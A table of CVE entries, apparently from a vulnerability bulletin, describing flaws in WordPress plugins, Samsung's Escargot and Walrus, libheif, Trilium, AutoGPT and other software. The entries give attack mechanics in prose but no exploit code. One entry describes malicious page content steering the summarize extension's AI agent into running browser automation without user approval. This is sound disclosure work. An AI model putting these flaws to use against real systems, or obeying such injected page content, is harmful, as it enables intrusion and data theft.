| Samsung Open Source--Escargot | Improper Check or Handling of Exceptional Conditions vulnerability in Samsung Open Source Escargot allows Input Data Manipulation. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. | 2026-05-19 | 5.5 | CVE-2026-47316 | https://github.com/Samsung/escargot/pull/1565 |
| Samsung Open Source--Escargot | Uncontrolled Recursion vulnerability in Samsung Open Source Escargot allows Excessive Allocation. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. | 2026-05-19 | 5.5 | CVE-2026-47317 | https://github.com/Samsung/escargot/pull/1565 |
| Samsung Open Source--Walrus | NULL pointer dereference vulnerability in Samsung Open Source Walrus allows an attacker to cause a denial of service via a crafted WebAssembly module containing deeply nested instructions. This issue affects Walrus: f339b8ee4ea701772e8ae640b3d1b12ac02b1ae9. | 2026-05-19 | 5.5 | CVE-2026-47307 | https://github.com/Samsung/walrus/pull/409 |
| Samsung Open Source--Walrus | NULL pointer dereference vulnerability in Samsung Open Source Walrus allows Pointer Manipulation. This issue affects Walrus: f339b8ee4ea701772e8ae640b3d1b12ac02b1ae9. | 2026-05-19 | 5.5 | CVE-2026-47308 | https://github.com/Samsung/walrus/pull/409 |
| shapedplugin--Location Weather WordPress Weather Forecast, AQI, Temperature and Weather Widget | The Location Weather plugin for WordPress is vulnerable to unauthorized modification of data due to missing capability checks on the `splw_update_block_options()` and `lwp_clean_weather_transients()` functions in all versions up to, and including, 3.0.2. This makes it possible for authenticated attackers, with Contributor-level access and above, to disable all weather blocks and purge all weather cache transients. The nonce required for these actions is exposed to all authenticated users via `wp_localize_script()` on the `init` hook. | 2026-05-22 | 4.3 | CVE-2026-7249 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d472011d-1623-4791-9d56-715d90fe0469?source=cve https://plugins.trac.wordpress.org/browser/location-weather/tags/3.0.2/includes/Admin/AdminDashboard/Splw_Blocks_Page_Wrapper.php#L256 https://plugins.trac.wordpress.org/browser/location-weather/tags/3.0.2/includes/Admin/AdminDashboard/Splw_Blocks_Page_Wrapper.php#L331 https://wordpress.org/plugins/location-weather/ https://plugins.trac.wordpress.org/browser/location-weather/tags/3.0.3/includes/Admin/AdminDashboard/Splw_Blocks_Page_Wrapper.php#L256 https://plugins.trac.wordpress.org/browser/location-weather/tags/3.0.3/includes/Admin/AdminDashboard/Splw_Blocks_Page_Wrapper.php#L332 |
| Significant-Gravitas--AutoGPT | AutoGPT is a workflow automation platform for creating, deploying, and managing continuous artificial intelligence agents. In versions 0.1.0 through 0.6.51, SendEmailBlock in autogpt_platform/backend/backend/blocks/email_block.py accepts a user-supplied smtp_server (string) and smtp_port (integer) as per-execution block inputs, then passes them directly to Python's smtplib.SMTP() to open a raw TCP connection with no IP address validation. This completely bypasses the platform's hardened SSRF protections in backend/util/request.py - the validate_url_host() function and BLOCKED_IP_NETWORKS blocklist that every other block uses to block connections to private, loopback, link-local, and cloud metadata addresses. An authenticated user on a shared AutoGPT deployment can use this to perform non-blind internal network port scanning and service fingerprinting: smtplib reads the target's TCP banner on connect and embeds it in the exception message, which is persisted as user-visible block output via the execution framework. This issue has been fixed in version 0.6.52. | 2026-05-19 | 5 | CVE-2026-33234 | https://github.com/Significant-Gravitas/AutoGPT/security/advisories/GHSA-4jwj-6mg5-wrwf https://github.com/Significant-Gravitas/AutoGPT/releases/tag/autogpt-platform-beta-v0.6.52 |
| simonholliday--Anomify AI Anomaly Detection and Alerting | The Anomify AI - Anomaly Detection and Alerting plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'anomify_api_key' parameter in versions up to and including 0.3.6. This is due to insufficient input sanitization and missing output escaping: the plugin applies sanitize_text_field() to the Metric Data Key input before saving it via update_option(), but sanitize_text_field() strips HTML tags without encoding double-quote characters, and the value is then echoed directly into an HTML attribute context (value="...") without esc_attr(). This makes it possible for authenticated attackers with administrator-level access to inject arbitrary web scripts that execute whenever a user visits the plugin's settings page. | 2026-05-20 | 4.4 | CVE-2026-6404 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4036057c-0c43-4d9c-97db-4861d91a4daa?source=cve https://plugins.trac.wordpress.org/browser/anomify/trunk/Anomify/Wp/includes/admin_options.php#L43 https://plugins.trac.wordpress.org/browser/anomify/tags/0.3.6/Anomify/Wp/includes/admin_options.php#L43 https://plugins.trac.wordpress.org/browser/anomify/trunk/Anomify/Wp/Admin.php#L32 https://plugins.trac.wordpress.org/browser/anomify/tags/0.3.6/Anomify/Wp/Admin.php#L32 https://plugins.trac.wordpress.org/browser/anomify/trunk/Anomify/Config.php#L152 https://plugins.trac.wordpress.org/browser/anomify/tags/0.3.6/Anomify/Config.php#L152 |
| simonholliday--Anomify AI Anomaly Detection and Alerting | The Anomify AI - Anomaly Detection and Alerting plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) leading to Stored Cross-Site Scripting (XSS) in versions up to and including 0.3.6. This is due to missing nonce verification on the settings page handler and insufficient output escaping in the admin_options.php template. The settings form includes no wp_nonce_field() and the handler performs no check_admin_referer() check, meaning any cross-origin POST can modify plugin settings. The API key field is sanitized only with sanitize_text_field(), which strips HTML tags but does not encode double-quote characters; the value is then rendered into an HTML attribute via bare echo without esc_attr(), allowing a double-quote attribute-escape payload to survive both sanitization and storage. This makes it possible for unauthenticated attackers to inject arbitrary web scripts by tricking a logged-in administrator into visiting a malicious page that submits a forged request, storing the payload in the database and causing it to execute in the administrator's browser whenever the plugin settings page is visited. | 2026-05-20 | 4.3 | CVE-2026-6405 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a1e02c2d-a38a-495c-9c37-098049297be2?source=cve https://plugins.trac.wordpress.org/browser/anomify/trunk/Anomify/Wp/includes/admin_options.php#L43 https://plugins.trac.wordpress.org/browser/anomify/tags/0.3.6/Anomify/Wp/includes/admin_options.php#L43 https://plugins.trac.wordpress.org/browser/anomify/trunk/Anomify/Wp/Admin.php#L31 https://plugins.trac.wordpress.org/browser/anomify/tags/0.3.6/Anomify/Wp/Admin.php#L31 https://plugins.trac.wordpress.org/browser/anomify/trunk/Anomify/Config.php#L152 https://plugins.trac.wordpress.org/browser/anomify/tags/0.3.6/Anomify/Config.php#L152 |
| smub--All in One SEO Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic | The All in One SEO plugin for WordPress is vulnerable to Sensitive Information Exposure via 'internalOptions' localized script data in versions up to, and including, 4.9.7 due to sensitive internal option data being passed to wp_localize_script() in post editor contexts without effective masking for low-privilege users. This makes it possible for authenticated attackers, with contributor-level access and above, to view configured API/OAuth tokens and license-related values from page source. | 2026-05-20 | 4.3 | CVE-2026-5075 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0d8bc203-c17a-4b31-8f9e-695f9e638cda?source=cve https://plugins.trac.wordpress.org/changeset/3532318/all-in-one-seo-pack |
| smub--Photo Gallery, Sliders, Proofing and Themes NextGEN Gallery | The Photo Gallery, Sliders, Proofing and Themes - NextGEN Gallery plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to and including 4.2.0. This is due to insufficient object-level authorization in the image deletion REST flow where the permission callback for DELETE /imagely/v1/images/{id} only checks 'NextGEN Manage gallery' permissions and does not enforce gallery ownership or 'NextGEN Manage others gallery' permissions. This makes it possible for authenticated attackers, with Subscriber-level privileges and 'NextGEN Manage gallery' capability, to delete gallery images belonging to other users as well as their associated image files from disk when deleteImg is enabled (default). | 2026-05-20 | 4.3 | CVE-2026-6566 | https://www.wordfence.com/threat-intel/vulnerabilities/id/439809ad-21ea-4a0b-b1fd-5de9f8f5ee7a?source=cve https://plugins.trac.wordpress.org/changeset/3533432/nextgen-gallery |
| smub--Slider by Soliloquy Responsive Image Slider for WordPress | The Slider by Soliloquy - Responsive Image Slider for WordPress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.8.1 via the map_meta_cap. This makes it possible for authenticated attackers, with subscriber-level access and above, to extract draft slider metadata including unpublished media URLs, captions, and slider configuration authored by administrators or editors. | 2026-05-22 | 4.3 | CVE-2026-7636 | https://www.wordfence.com/threat-intel/vulnerabilities/id/54115a9a-dadd-4f18-a139-02ec89f0a571?source=cve https://plugins.trac.wordpress.org/browser/soliloquy-lite/trunk/includes/global/posttype.php#L90 https://plugins.trac.wordpress.org/browser/soliloquy-lite/trunk/includes/global/posttype.php#L177 https://plugins.trac.wordpress.org/browser/soliloquy-lite/tags/2.8.1/includes/global/posttype.php#L177 https://plugins.trac.wordpress.org/browser/soliloquy-lite/trunk/includes/global/posttype.php#L125 https://plugins.trac.wordpress.org/browser/soliloquy-lite/tags/2.8.1/includes/global/posttype.php#L125 https://plugins.trac.wordpress.org/browser/soliloquy-lite/tags/2.8.1/includes/global/posttype.php#L90 https://plugins.trac.wordpress.org/changeset/3538404/soliloquy-lite/trunk/includes/global/posttype.php?old=3395148&old_path=soliloquy-lite%2Ftrunk%2Fincludes%2Fglobal%2Fposttype.php |
| SourceCodester--Hospitals Patient Records Management System | A security flaw has been discovered in SourceCodester Hospitals Patient Records Management System 1.0. Impacted is an unknown function of the file /admin/patients/view_history.php. The manipulation of the argument ID results in sql injection. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-23 | 6.3 | CVE-2026-9342 | VDB-365305; SourceCodester Hospitals Patient Records Management System view_history.php sql injection VDB-365305; CTI Indicators (IOB, IOC, TTP, IOA) Submit #812834; sourcecodester Hospital's Patient Records Management System V1.0 SQL injection https://github.com/july-skyload/exp/issues/1 https://www.sourcecodester.com/ |
| Splunk--Splunk AI Toolkit | In Splunk AI Toolkit versions below 5.7.3, a low-privileged user that does not hold the 'admin' or 'power' roles could access confidential data that was restricted through `srchFilter` configurations on custom roles. The app contains an `authorize.conf` configuration file with a `srchFilter` entry that modifies the built-in 'user' role. Because the Splunk platform combines inherited search filters with the `OR` SPL operator, the injected filter overrides more restrictive filters on child roles. | 2026-05-20 | 6.5 | CVE-2026-20238 | https://advisory.splunk.com/advisories/SVD-2026-0502 |
| steipete--summarize | Summarize prior to 0.15.1 contains a missing authorization vulnerability in the content script window.postMessage bridge that allows malicious pages to perform unauthorized operations on automation artifacts. Attackers can simulate runtime messages with spoofed sender identifiers to list, read, create, overwrite, or delete automation artifacts scoped to the affected tab without proper authorization checks. | 2026-05-18 | 6.1 | CVE-2026-45243 | https://github.com/steipete/summarize/releases/tag/v0.15.2 https://github.com/steipete/summarize/pull/222 https://github.com/steipete/summarize/commit/357544063af535bd574752622f9eb94be33ee5fd https://www.vulncheck.com/advisories/summarize-browser-extension-missing-authorization-via-content-script |
| steipete--summarize | Summarize prior to 0.15.1 contains a missing authorization vulnerability that allows attackers to execute browser automation actions without per-call user approval when the extension automation feature is enabled. Attackers can influence the agent through malicious page or summary content to invoke enabled extension automation tools such as navigation or debugger-backed actions, bypassing the final user approval step when a user interacts with attacker-controlled content. | 2026-05-18 | 5.4 | CVE-2026-45244 | https://github.com/steipete/summarize/releases/tag/v0.15.2 https://github.com/steipete/summarize/pull/219 https://github.com/steipete/summarize/commit/e64fe3ecd1bb4fdc181dcfa88c96b9e1914ced0e https://www.vulncheck.com/advisories/summarize-unapproved-browser-automation-execution |
| steipete--summarize | Summarize prior to 0.15.1 contains an insecure file permission vulnerability in the refresh-free configuration rewrite path that allows local users to read sensitive credentials by exploiting default filesystem permissions. When the refresh-free path rewrites the configuration file, it creates the replacement with default process umask permissions instead of preserving the original file permissions, exposing the config file containing API keys and provider credentials to other local users on shared Unix-like systems. | 2026-05-18 | 5.5 | CVE-2026-45246 | https://github.com/steipete/summarize/releases/tag/v0.15.2 https://github.com/steipete/summarize/pull/217 https://github.com/steipete/summarize/commit/9e990193650a23dab73f37d5e1964d574a44098b https://www.vulncheck.com/advisories/summarize-insecure-file-permissions-information-disclosure |
| storybookjs--telejson | TeleJSON prior to 6.0.0 contains a DOM-based cross-site scripting vulnerability in the parse() function that allows attackers to execute arbitrary JavaScript by delivering a crafted JSON payload containing a malicious _constructor-name_ property value. The custom reviver passes the constructor name directly to new Function() without sanitization when recreating object prototypes, enabling attackers to inject arbitrary JavaScript through vectors such as postMessage in cross-frame communication contexts to achieve script execution within the application. | 2026-05-20 | 6.1 | CVE-2026-47099 | https://github.com/storybookjs/telejson/security/advisories/GHSA-ccgf-5rwj-j3hv https://github.com/Niccolo10/Security-Advisories/blob/main/CVE-2026-47099/cve-2026-47099.md https://www.vulncheck.com/advisories/telejson-dom-based-xss-via-parse-function |
| strukturag--libheif | libheif is a HEIF and AVIF file format decoder and encoder. In versions 1.21.2 and below, a crafted 792-byte HEIF sequence file with samples_per_chunk=0 in the stsc box causes an unsigned integer underflow in the Chunk constructor (m_last_sample = 0 + 0 - 1 = UINT32_MAX), mapping all samples to an empty chunk and resulting in a denial of service. When any sample is accessed, the library reads from index 0 of an empty std::vector, causing a guaranteed SEGV (null-page read). The file parses successfully without producing an error; the crash occurs on the first frame access. This issue has been fixed in version 1.22.0. | 2026-05-19 | 6.5 | CVE-2026-32738 | https://github.com/strukturag/libheif/security/advisories/GHSA-7f2h-cmpf-v9ww |
| strukturag--libheif | libheif is a HEIF and AVIF file format decoder and encoder. In versions 1.21.2 and below, a crafted 800-byte HEIF sequence file causes an infinite loop in Box_stts::get_sample_duration(), consuming 100% CPU indefinitely with zero progress, leading to DoS. The loop has no iteration limit or timeout and is triggered during file open (parsing) - before any user interaction or image decoding. The process stays alive (no crash, no error logged), making it invisible to crash-based monitoring. This issue has been fixed in version 1.22.0. | 2026-05-19 | 6.5 | CVE-2026-32739 | https://github.com/strukturag/libheif/security/advisories/GHSA-j9g7-q9hv-gq8c https://github.com/strukturag/libheif/releases/tag/v1.22.0 |
| strukturag--libheif | libheif is a HEIF and AVIF file format decoder and encoder. In versions 1.21.2 and prior, when decoding a HEIF grid image with strict_decoding=false (the default), a corrupted tile silently fails to decode and the library returns heif_error_Ok with no indication of failure, leading to an uninitialized heap memory information leak. The canvas is allocated via create_clone_image_at_new_size() → plane.alloc() → new (std::nothrow) uint8_t[allocation_size] which does not zero the memory; only the alpha plane is explicitly initialized via fill_plane(), so the Y, Cb, and Cr planes contain whatever was previously at that heap address. The failed tile's region of the canvas is never written. It retains uninitialized heap data that is delivered to the caller as decoded pixel values (4,096 bytes per Y/Cb/Cr plane = 12,288+ bytes total). Any application using libheif to decode grid-based HEIF/AVIF files with default settings is vulnerable: a crafted .heic or .avif file causes 4,096+ bytes of heap memory to appear as pixel values in the decoded image, and the calling application receives heif_error_Ok, so it has no indication the output contains heap garbage. In server-side image processing, an uploaded crafted HEIF decoded and re-encoded (e.g., as PNG/JPEG for thumbnails, CDN, social media) can leak cross-user data such as auth tokens, database results, and other users' image data. This issue has been fixed in version 1.22.0. | 2026-05-19 | 6.5 | CVE-2026-32814 | https://github.com/strukturag/libheif/security/advisories/GHSA-4m8r-34pg-rvwc https://github.com/strukturag/libheif/releases/tag/v1.22.0 |
| strukturag--libheif | libheif is a HEIF and AVIF file format decoder and encoder. In versions 1.21.2 and prior, a malformed HEIF sequence file can trigger an out-of-bounds read in core sequence parsing logic, causing DoS. A malformed file can have stco.entry_count == 0 (creating no chunks) while still passing validation because saio.entry_count == 0 matches, but with saiz.sample_count > 0 the SampleAuxInfoReader constructor still enters its loop. This leads to an out-of-bounds dereference on the empty chunks[0] in chunked mode. | 2026-05-22 | 6.5 | CVE-2026-41069 | https://github.com/strukturag/libheif/security/advisories/GHSA-p82x-fpmv-576r https://github.com/strukturag/libheif/releases/tag/v1.22.0 |
| submone--Amazon Scraper | The Amazon Scraper plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-20 | 4.3 | CVE-2026-8419 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c956e4c5-bf7e-4ec4-b795-74d477a61694?source=cve https://plugins.trac.wordpress.org/browser/amazon-scraper/trunk/amazon-admin.php#L49 https://plugins.trac.wordpress.org/browser/amazon-scraper/tags/1.1/amazon-admin.php#L49 https://plugins.trac.wordpress.org/browser/amazon-scraper/trunk/amazon-admin.php#L13 https://plugins.trac.wordpress.org/browser/amazon-scraper/tags/1.1/amazon-admin.php#L13 https://plugins.trac.wordpress.org/browser/amazon-scraper/trunk/amazon-admin.php#L26 https://plugins.trac.wordpress.org/browser/amazon-scraper/tags/1.1/amazon-admin.php#L26 https://plugins.trac.wordpress.org/browser/amazon-scraper/trunk/amazon-admin.php#L45 https://plugins.trac.wordpress.org/browser/amazon-scraper/tags/1.1/amazon-admin.php#L45 |
| svil4ok--Bottom Bar | The Bottom Bar plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to and including 0.1.7. This is due to missing nonce verification on the plugin's settings update forms handled in bottom-bar-admin.php. None of the three settings forms (main settings, sharing services, restore defaults) include a wp_nonce_field(), and the server-side processing code never calls check_admin_referer() or any equivalent nonce validation before processing POST data and calling update_option(). This makes it possible for unauthenticated attackers to trick a logged-in administrator into submitting a crafted request that updates plugin configuration options, such as changing the language, maximum post counts, or enabled sharing services. | 2026-05-20 | 4.3 | CVE-2026-6401 | https://www.wordfence.com/threat-intel/vulnerabilities/id/db0715ed-a06e-4a68-b9c3-408887cae113?source=cve https://plugins.trac.wordpress.org/browser/bottom-bar/trunk/bottom-bar-admin.php#L16 https://plugins.trac.wordpress.org/browser/bottom-bar/tags/0.1.7/bottom-bar-admin.php#L16 https://plugins.trac.wordpress.org/browser/bottom-bar/trunk/bottom-bar-admin.php#L59 https://plugins.trac.wordpress.org/browser/bottom-bar/tags/0.1.7/bottom-bar-admin.php#L59 |
| syslink software AG--Avantra | Use of default password vulnerability in syslink software AG Avantra on Linux, Windows allows Try Common or Default Usernames and Passwords. This issue affects Avantra: before 25.3.0. | 2026-05-22 | 5.1 | CVE-2026-8672 | https://support.avantra.com/hc/en-us/articles/5535551609759 |
| syslink software AG--Avantra | Unprotected transport of credentials vulnerability in syslink software AG Avantra on Linux, Windows allows Sniffing Attacks. This issue affects Avantra: before 25.3.0. | 2026-05-22 | 5.9 | CVE-2026-8673 | https://support.avantra.com/hc/en-us/articles/5535621927071 |
| Talend--Talend Administration Center | A stored cross-site scripting vulnerability has been found in the Talend Administration Center. An attacker with permission to manage servers can store an XSS payload that can be triggered by a different user. | 2026-05-20 | 5.4 | CVE-2026-9056 | https://community.qlik.com/t5/Official-Support-Articles/Security-fix-for-Qlik-Talend-Administration-Center-cross-site/ta-p/2548522 |
| TeamViewer--DEX (On-premises) | A broken access control vulnerability exists in the TeamViewer DEX Platform (On-Premises) prior to version 9.2. Certain backend API endpoints do not correctly enforce authorization checks, allowing an authenticated user with low privileges to perform actions and access resources intended only for higher-privileged roles. An attacker with low-privileged credentials may exploit this to gain unauthorized access to administrative or sensitive functionality. | 2026-05-22 | 5.4 | CVE-2026-8381 | https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2026-1005/ |
| techjewel--FluentCRM Email Newsletter, Automation, Email Marketing, Email Campaigns, Optins, Leads, and CRM Solution | The FluentCRM - Email Newsletter, Automation, Email Marketing, Email Campaigns, Optins, Leads, and CRM Solution plugin for WordPress is vulnerable to Blind Server-Side Request Forgery in all versions up to, and including, 2.9.87 via the 'SubscribeURL' parameter. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. Exploitation requires that the SES bounce handling key ('_fc_bounce_key') has never been stored (i.e., the site is in its default/unconfigured state with respect to SES bounce handling) as visiting the bounce configuration page auto-generates and stores a random key that causes the authentication check to evaluate correctly and reject unauthenticated requests. | 2026-05-22 | 5.4 | CVE-2026-7798 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5c3ca2d7-7af9-401f-bc5a-1796c6253cb0?source=cve https://plugins.trac.wordpress.org/browser/fluent-crm/trunk/app/Hooks/Handlers/ExternalPages.php#L113 https://plugins.trac.wordpress.org/browser/fluent-crm/tags/2.9.87/app/Hooks/Handlers/ExternalPages.php#L113 https://plugins.trac.wordpress.org/browser/fluent-crm/trunk/app/Hooks/Handlers/ExternalPages.php#L85 https://plugins.trac.wordpress.org/browser/fluent-crm/tags/2.9.87/app/Hooks/Handlers/ExternalPages.php#L85 https://plugins.trac.wordpress.org/browser/fluent-crm/trunk/app/Hooks/Handlers/ExternalPages.php#L87 https://plugins.trac.wordpress.org/browser/fluent-crm/tags/2.9.87/app/Hooks/Handlers/ExternalPages.php#L87 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3532271%40fluent-crm&new=3532271%40fluent-crm&sfp_email=&sfph_mail= |
| Technitium--DNS Server | Technitium DNS Server aggressively tries to fetch missing RRSIG records or mismatched DNSKEY records. An attacker in control of a domain can cause a vulnerable system to generate excessive network traffic. Fixed in 15.0. | 2026-05-19 | 5.8 | CVE-2026-45557 | |
| Tencent--WeKnora | A vulnerability has been found in Tencent WeKnora up to 0.3.6. Affected by this issue is the function getKnowledgeBaseForInitialization of the file internal/handler/initialization.go of the component Config API Endpoint. The manipulation of the argument kbId leads to authorization bypass. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-18 | 6.3 | CVE-2026-8786 | VDB-364410 \| Tencent WeKnora Config API Endpoint initialization.go getKnowledgeBaseForInitialization authorization VDB-364410 \| CTI Indicators (IOB, IOC, IOA) Submit #812172 \| Tencent WeKnora <= v0.3.6 Insecure Direct Object Reference (CWE-639) https://gist.github.com/YLChen-007/1cdc50418f29af7ae671466425e52c7b |
| themefusion--Avada (Fusion) Builder | The Avada (Fusion) Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple shortcodes in all versions up to, and including, 3.15.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user (typically an administrator) accesses a page displaying dynamic user data (such as via the Dynamic Data feature pulling user biographical information). | 2026-05-21 | 6.4 | CVE-2026-1543 | https://www.wordfence.com/threat-intel/vulnerabilities/id/72a6b040-ed02-4561-82f2-4adb820bdf7d?source=cve https://themeforest.net/item/avada-responsive-multipurpose-theme/2833226 https://avada.com/documentation/avada-changelog/ |
| Themeisle--Visualizer | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themeisle Visualizer allows Stored XSS. This issue affects Visualizer: from n/a before 4.0.0. | 2026-05-20 | 6.5 | CVE-2026-24573 | https://patchstack.com/database/wordpress/plugin/visualizer/vulnerability/wordpress-visualizer-plugin-4-0-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| themeum--Kirki Freeform Page Builder, Website Builder & Customizer | The Kirki - Freeform Page Builder, Website Builder & Customizer plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 6.0.6. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to view all Kirki frontend forms and read stored visitor form submission data, including contact details, messages, and any other visitor-provided information submitted through site forms. | 2026-05-19 | 6.5 | CVE-2026-8096 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1a4414b1-6a49-42f8-9927-93763d1502ce?source=cve https://plugins.trac.wordpress.org/browser/kirki/tags/6.0.4/includes/Ajax.php#L675 https://plugins.trac.wordpress.org/changeset/3535640/kirki |
| Tobias--CF7 WOW Styler | Missing Authorization vulnerability in Tobias CF7 WOW Styler allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects CF7 WOW Styler: from n/a through 1.7.6. | 2026-05-21 | 5.3 | CVE-2026-27393 | https://patchstack.com/database/wordpress/plugin/cf7-styler/vulnerability/wordpress-cf7-wow-styler-plugin-1-7-6-broken-access-control-vulnerability?_s_id=cve |
| Trend Micro, Inc.--TrendAI Apex One | A directory traversal vulnerability in the Apex One (on-premise) server could allow a pre-authenticated local attacker to modify a key table on the server to inject malicious code to deploy to agents on affected installations. This vulnerability is only exploitable on the on-premise version of Apex One and a potential attacker must have access to the Apex One Server and already obtained administrative credentials to the server via some other method to exploit this vulnerability. | 2026-05-21 | 6.7 | CVE-2026-34926 | https://success.trendmicro.com/en-US/solution/KA-0023430 https://success.trendmicro.com/ja-JP/solution/KA-0022974 https://jvn.jp/en/vu/JVNVU90583059/ https://www.jpcert.or.jp/english/at/2026/at260014.html |
| TriliumNext--Trilium | Trilium Notes is an open-source, cross-platform hierarchical note taking application for building large personal knowledge bases. Versions 0.102.1 and prior are vulnerable to Local File Inclusion, allowing an authenticated attacker to read sensitive arbitrary files from the server's filesystem. The uploadModifiedFileToAttachment function, which is called when a POST request is received to /api/attachments/{attachmentId}/upload-modified-file, replaces the content of the attachment with the content from another file (whose path is provided in filePath of Request body). After which the content of the attachment can be viewed at /api/attachments/{attachmentId}/download. This exposes sensitive system files such as SSH keys, credentials, configs, and OS files, potentially leading to remote code execution and compromise of co-hosted applications. This issue has been fixed in version 0.102.2. | 2026-05-19 | 6.8 | CVE-2026-35593 | https://github.com/TriliumNext/Trilium/security/advisories/GHSA-hf4x-22rg-pjjp https://github.com/TriliumNext/Trilium/releases/tag/v0.102.2 |
| TriliumNext--Trilium | Trilium Notes is a cross-platform, hierarchical note taking application focused on building large personal knowledge bases. Versions 0.102.1 and prior contain a critical security flaw where lack of SVG sanitization combined with a disabled Content Security Policy (CSP) and a publicly reachable backend execution API results in an unauthenticated Remote Code Execution (RCE). The vulnerability arises from an insecure-by-design architecture: Trilium serves SVG attachments with the image/svg+xml MIME type without any sanitization, and it explicitly disables Helmet's Content Security Policy middleware, removing the primary defense against script execution in served assets. Because the malicious SVG runs under the Same-Origin Policy, it can issue a fetch('/') to extract the csrfToken from the document body. With that token, it can send a signed request to /api/script/exec to execute arbitrary Node.js code on the server. An attacker can compromise the entire server instance simply by tricking an authenticated user into viewing a shared SVG attachment. The issue has been fixed in version 0.102.2. | 2026-05-20 | 6.8 | CVE-2026-39311 | https://github.com/TriliumNext/Trilium/security/advisories/GHSA-p837-cxw3-m964 https://github.com/TriliumNext/Trilium/releases/tag/v0.102.2 |
| TriliumNext--Trilium | Trilium Notes is a cross-platform, hierarchical note taking application focused on building large personal knowledge bases. In versions 0.102.1 and prior, the Electron configuration is vulnerable to TCC Bypass via Prompt Spoofing, allowing local attackers to trigger misleading macOS permission prompts by running malicious code under the identity of the trusted app. The root cause is that the RunAsNode fuse allows launching the app in a special Node.js mode using -e to execute arbitrary system commands with Trilium Notes's permissions and identity. An attacker can leverage this through a subprocess to request any sensitive permissions, such as access to hardware (camera, microphone) and TCC-protected files, causing the TCC system prompt to appear as if the request came from Trilium rather than the attacker's code, because macOS treats the subprocess as part of the parent application. Exploitation allows access to TCC-protected resources like the screen, camera, microphone, and folders such as ~/Documents and ~/Downloads, undermining macOS's security model and UI integrity through social engineering. This issue has been fixed in version 0.102.2. | 2026-05-19 | 5.5 | CVE-2026-39309 | https://github.com/TriliumNext/Trilium/security/advisories/GHSA-66pm-8hvq-2wwx https://github.com/TriliumNext/Trilium/releases/tag/v0.102.2 |
| Turkiye Electricity Transmission Corporation (TEİAŞ)--Mobile Application | Improper restriction of excessive authentication attempts vulnerability in Turkiye Electricity Transmission Corporation (TEİAŞ) Mobile Application allows Brute Force. This issue affects Mobile Application: from 1.6.2 before 1.13. | 2026-05-21 | 6.3 | CVE-2026-1816 | https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0286 |
| Turkiye Electricity Transmission Corporation (TEİAŞ)--Mobile Application | Insufficient session expiration vulnerability in Turkiye Electricity Transmission Corporation (TEİAŞ) Mobile Application allows Session Hijacking. This issue affects Mobile Application: from 1.6.2 before 1.13. | 2026-05-21 | 5.7 | CVE-2026-1815 | https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0286 |
| UserSpice--userSpice | userSpice 4.3.24 contains a cross-site scripting vulnerability that allows attackers to inject malicious scripts through the X-Forwarded-For HTTP header. Attackers can send crafted requests to the backup.php endpoint with XSS payloads in the X-Forwarded-For header that execute when administrators visit the audit log page. | 2026-05-23 | 6.1 | CVE-2018-25349 | ExploitDB-44871 VulnCheck Advisory: userSpice 4.3.24 Cross-Site Scripting via X-Forwarded-For Header |
| vatanyazilim--VatanSMS WP SMS | The VatanSMS WP SMS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `page` parameter in all versions up to, and including, 1.01. This is due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrator into performing an action such as clicking on a link. | 2026-05-20 | 6.1 | CVE-2026-7462 | https://www.wordfence.com/threat-intel/vulnerabilities/id/96ef8459-1600-4ca0-93c6-0ee42f8adabd?source=cve https://plugins.trac.wordpress.org/browser/wp-sms-vatansms-com/trunk/includes/admin/groups/groups.php#L34 https://plugins.trac.wordpress.org/browser/wp-sms-vatansms-com/trunk/includes/admin/outbox/outbox.php#L5 https://plugins.trac.wordpress.org/browser/wp-sms-vatansms-com/trunk/includes/admin/subscribers/subscribers.php#L128 |
| VillaTheme--HAPPY | Missing Authorization vulnerability in VillaTheme HAPPY allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects HAPPY: from n/a through 1.0.10. | 2026-05-21 | 6.5 | CVE-2026-39593 | https://patchstack.com/database/wordpress/plugin/happy-helpdesk-support-ticket-system/vulnerability/wordpress-happy-plugin-1-0-10-broken-access-control-vulnerability?_s_id=cve |
